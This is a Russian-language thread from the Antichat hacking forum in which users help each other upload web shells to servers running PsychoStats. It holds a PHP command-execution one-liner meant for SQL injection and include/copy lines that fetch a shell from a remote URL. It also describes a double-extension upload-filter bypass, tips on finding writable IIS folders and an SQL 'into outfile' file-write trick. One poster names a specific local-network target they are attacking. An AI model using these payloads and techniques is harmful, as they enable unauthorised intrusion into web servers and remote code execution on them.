Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

23.01.2008, 03:27
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
а там регистр глобалс включен?
тебе надо вот это вписывать:
<?php system($_GET['cmd']);?> причем это лучше захекисть в sql запросе
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 23.01.2008 в 03:30..
|
|
|

23.01.2008, 03:40
|
|
Новичок
Регистрация: 28.10.2006
Сообщений: 23
Провел на форуме: 125281
Репутация:
1
|
|
Scipio о млин точно ...куль сеньк всем...
слу ... а как терь нормальный пхп файлик закинуть на машину... плз подкинь идею
|
|
|

23.01.2008, 03:54
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
<?php include("http://путь до шелла");?>
или
<?php copy("http://путь до шелла","shelcheng.php");?>
это тоже в хекс исли вариант с copy то он шелл скопирует в текущую папку
а с инклюдом и так все понятно
__________________
Карфаген должен быть разрушен...
|
|
|

01.02.2008, 13:23
|
|
Новичок
Регистрация: 20.05.2007
Сообщений: 15
Провел на форуме: 381570
Репутация:
8
|
|
драсьте.
у нас есть отдельный "сервер" для игр. виден есессно только в локалке, соответственно адрес 172.17.1.11, так же на сайт можно пройти по сцыле http://games.k26.ru (опять же только в локалке)
психостатс расположен в http://172.17.1.11/stats
попробовал сплоит с первой страницы - теперь по http://172.17.1.11/stats/ выдет кучу ошибок и ничего не открыват, по http://games.k26.ru/stats/ все отлично открывается.
пробовал как в видео. в общем не могу понять. куда можно залить файл. выяснил полный путь сайта. c:/inetpub/wwwroot/stats. видно что это iis. пытался залить файл куда только можно, ничего не получается. может быть потому, что остальные директории запрещены на заливку файлов.
так же есть http://games.k26.ru/wow (сервер вов). так же пытался туда залить - безуспешно.
и вот думаю - куда лить файл?  существуют ли стандартные директории в iis, куда можно лить файлы?
|
|
|

01.02.2008, 14:02
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме: 5571194
Репутация:
1934
|
|
Lordick, найти папку на которую точно есть доступ на запись. Такие папки обычно являются папками хранения всяких аватаров, картинок, вложений и тп. Поищи такие папки в психостате. Если есть форум, посмотри там такую папку.
А вообще, я смотрю сервер на винде стоит, там нет таких разграничений на прав, как в *никсах и все папки открыты на запись. Magic Quotes может быть включен=>фильтруются ковычки=>запрос некорректен.
Последний раз редактировалось AFoST; 01.02.2008 в 14:10..
|
|
|

04.02.2008, 20:07
|
|
Участник форума
Регистрация: 11.11.2007
Сообщений: 260
Провел на форуме: 2808062
Репутация:
155
|
|
помогите как слить шелл с удаленного серва?
папку с правами нашел.
|
|
|
Заливка шелла в PsychoStats |

17.06.2009, 17:03
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме: 810079
Репутация:
90
|
|
Заливка шелла в PsychoStats
Нашёл способ...
Заходим в админку > значки, переименовываем шелл в что-то типо shell.PHP.hgf gif, заливаем. Главное чтобы расширение оканчивалось на gif  Вот собственно и получаем шелл [path]/images/icons/shell.PHP.hgfgif.
Объясняю как это происходит:
движок проверяет только три последних символа в расширении файла, поэтому делаем такое расширение PHP.hgf gif, предварительно поставив расширение .PHP. и он этот файл легко пропускает. Для Apach'а расширение .hgfgif неизвестно и поэтому он смотрит на расширение левее и интерпретирует его как php-скрипт!
Проверяйте: может и на других двигах сработает...
Последний раз редактировалось InFlame; 05.09.2009 в 20:08..
|
|
|

02.04.2010, 21:29
|
|
Постоянный
Регистрация: 29.07.2009
Сообщений: 400
Провел на форуме: 1455812
Репутация:
150
|
|
Короче такая ситуация.
Получил доступ к админке.
SQL которые были описаны до этого не работают.
Зашел в админку, добавил расширение для картинок - png, jpg, gif, php
Так. Теперь в icons (где заливать файлы). Такие методы, как менять расширение, как сказал InFlame - file.PHP.asdgif - не катят. Нашел только такой способ:
Залил себе на сайт файл. script.php и решил его сразу залить через Upload From URL. - вывел ошибку The URL does not point to an image. Немного подумал. Сделал содержимое файла таким:
PHP код:
<?php
header('Content-type: image/php');
echo 'OK!';
?>
Теперь скормил его Upload From URL и файл успешно залился. Переш на него - site.ru/stats/img/icons/script.php и Мне вывело OK!
Я обрадовался, начал кормить туда шелл. Но ВОТ ТАКАЯ БЕДА!
Содержимое файла оказывается таким, как он выполняется на моем хосте. Тоесть. Если я напимер сделаю <?php system('dir'); ?> То на хосте жертвы будет красоваться содердимое моего хоста.
Файл получается статичным.
Прошу помощи ))))))))))))))
|
|
|

02.04.2010, 22:05
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме: 14023893
Репутация:
2163
|
|
echo '<?phpinfo();?>'; ?
/add по сабжу, дописать свои данные в файл из подзапроса можно так
order by (select 1 into outfile 'lala' lines terminated by 'php')
или вообще обойтись без подзапроса (выйдет даже короче)
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
Последний раз редактировалось l1ght; 02.04.2010 в 22:12..
|
|
|

02.04.2010, 22:13
|
|
Постоянный
Регистрация: 29.07.2009
Сообщений: 400
Провел на форуме: 1455812
Репутация:
150
|
|
Сообщение от l1ght
echo '<?phpinfo();?>'; ?
:-* :-* :-* :-*
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|